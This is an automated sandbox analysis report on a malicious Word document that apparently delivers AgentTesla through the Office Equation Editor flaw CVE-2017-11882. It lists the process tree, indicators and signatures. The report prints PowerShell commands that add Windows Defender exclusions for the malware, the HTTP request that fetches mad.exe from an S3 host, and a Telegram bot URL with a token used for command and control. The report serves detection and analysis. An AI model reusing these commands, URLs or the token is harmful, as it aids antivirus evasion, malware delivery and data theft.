Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Allignright_companyprofile.doc

Overview

General Information

Sample Name:Allignright_companyprofile.doc
Analysis ID:404236
MD5:5a0c6dd1f7bbc5272f2ced270e2d4d8a
SHA1:9f553e08793745277db8a0d3aa82a63b7526a28b
SHA256:fbc12470553e748b10dd0e1a15c6e28a1e777b626757349e46031f7e0608b8e6
Tags:AgentTesladoc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell adding suspicious path to exclusion list
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Drops PE files to the startup folder
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Non Interactive PowerShell
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1796 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 1296 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • CTF loader_es.exe (PID: 2336 cmdline: C:\Users\user\AppData\Roaming\CTF loader_es.exe MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
      • powershell.exe (PID: 2536 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2300 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2772 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2852 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • Bw6d8Paf6bOV36xS4N6.exe (PID: 2368 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
        • powershell.exe (PID: 1552 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 660 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 2812 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 2804 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2252 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 3064 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 920 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • CTF loader_es.exe (PID: 2444 cmdline: C:\Users\user\AppData\Roaming\CTF loader_es.exe MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
      • CTF loader_es.exe (PID: 2788 cmdline: C:\Users\user\AppData\Roaming\CTF loader_es.exe MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
  • Bw6d8Paf6bOV36xS4N6.exe (PID: 1192 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
    • powershell.exe (PID: 2920 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 2300 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 2760 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 1900 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • svchost.exe (PID: 2916 cmdline: 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Sigma Overview

Exploits:

barindex
Sigma detected: EQNEDT32.EXE connecting to internetShow sources
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 52.218.240.113, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1296, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXEShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1296, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe

System Summary:

barindex
Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\CTF loader_es.exe, CommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\CTF loader_es.exe, NewProcessName: C:\Users\user\AppData\Roaming\CTF loader_es.exe, OriginalFileName: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1296, ProcessCommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ProcessId: 2336
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentImage: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentProcessId: 2336, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force, ProcessId: 2536

Malware Analysis System Evasion:

barindex
Sigma detected: Powershell adding suspicious path to exclusion listShow sources
Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentImage: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentProcessId: 2336, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force, ProcessId: 2300

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exeVirustotal: Detection: 41%Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exeReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeVirustotal: Detection: 41%Perma Link
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeVirustotal: Detection: 41%Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeReversingLabs: Detection: 44%
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeReversingLabs: Detection: 44%
Multi AV Scanner detection for submitted fileShow sources
Source: Allignright_companyprofile.docReversingLabs: Detection: 14%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeJoe Sandbox ML: detected
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeJoe Sandbox ML: detected

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exeJump to behavior
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: ??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2536.6001966ion.pdby.resources.exes.exeI.ni.dll source: powershell.exe, 00000005.00000002.2117946573.00000000003F3000.00000004.00000020.sdmp
Source: Binary string: G??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2772.6004244ion.pdb source: powershell.exe, 00000009.00000002.2119685464.000000000037A000.00000004.00000020.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2135376246.000000000579D000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2135376246.000000000579D000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2124286114.0000000002AD0000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: number of queries: 2505
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\Jump to behavior
Source: global trafficDNS query: name: miolouno.s3-us-west-2.amazonaws.com
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 52.218.240.113:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 52.218.240.113:80

Networking:

barindex
Uses the Telegram API (likely for C&C communication)Show sources
Source: unknownDNS query: name: api.telegram.org
Source: global trafficHTTP traffic detected: GET /mad.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: miolouno.s3-us-west-2.amazonaws.comConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{784A4D1B-DE8E-4300-98F0-AE5841A8170E}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /mad.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: miolouno.s3-us-west-2.amazonaws.comConnection: Keep-Alive
Source: CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: miolouno.s3-us-west-2.amazonaws.com
Source: CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: CTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: CTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: CTF loader_es.exe, 00000004.00000002.2201019666.00000000052B0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2120486810.0000000002210000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: CTF loader_es.exe, 00000004.00000003.2124857296.0000000002B2B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: CTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: CTF loader_es.exe, 00000004.00000002.2201019666.00000000052B0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2120486810.0000000002210000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: CTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000003.2110241441.0000000000407000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2110770668.00000000005AA000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000003.2110241441.0000000000407000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2110770668.00000000005AA000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: CTF loader_es.exe, 00000004.00000002.2186884993.0000000003C1A000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1774464259:AAF9FzZxHVqbPEcJ50c3sNsdvyt_OEQ0GcA/
Source: CTF loader_es.exe, 00000004.00000002.2186884993.0000000003C1A000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip

System Summary:

barindex
Office equation editor drops PE fileShow sources
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\CTF loader_es.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0037B2EE NtQuerySystemInformation,5_2_0037B2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0037B2CC NtQuerySystemInformation,5_2_0037B2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_01F1B2EE NtQuerySystemInformation,7_2_01F1B2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_01F1B2CC NtQuerySystemInformation,7_2_01F1B2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0209B2EE NtQuerySystemInformation,9_2_0209B2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0209B2CC NtQuerySystemInformation,9_2_0209B2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_01D3B2EE NtQuerySystemInformation,11_2_01D3B2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_01D3B2CC NtQuerySystemInformation,11_2_01D3B2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0211B2EE NtQuerySystemInformation,14_2_0211B2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0211B2CC NtQuerySystemInformation,14_2_0211B2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_01CAB2EE NtQuerySystemInformation,15_2_01CAB2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_01CAB2CC NtQuerySystemInformation,15_2_01CAB2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_01B8B2EE NtQuerySystemInformation,17_2_01B8B2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_01B8B2CC NtQuerySystemInformation,17_2_01B8B2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_003CB2EE NtQuerySystemInformation,22_2_003CB2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_003CB2CC NtQuerySystemInformation,22_2_003CB2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_01E8B2EE NtQuerySystemInformation,24_2_01E8B2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_01E8B2CC NtQuerySystemInformation,24_2_01E8B2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_0200B2EE NtQuerySystemInformation,26_2_0200B2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_0200B2CC NtQuerySystemInformation,26_2_0200B2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_025DB2EE NtQuerySystemInformation,28_2_025DB2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_025DB2CC NtQuerySystemInformation,28_2_025DB2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_006DB2EE NtQuerySystemInformation,32_2_006DB2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_006DB2CC NtQuerySystemInformation,32_2_006DB2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_0067B2EE NtQuerySystemInformation,34_2_0067B2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_0067B2CC NtQuerySystemInformation,34_2_0067B2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_0043B2EE NtQuerySystemInformation,36_2_0043B2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_0043B2CC NtQuerySystemInformation,36_2_0043B2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_01DEB2EE NtQuerySystemInformation,38_2_01DEB2EE
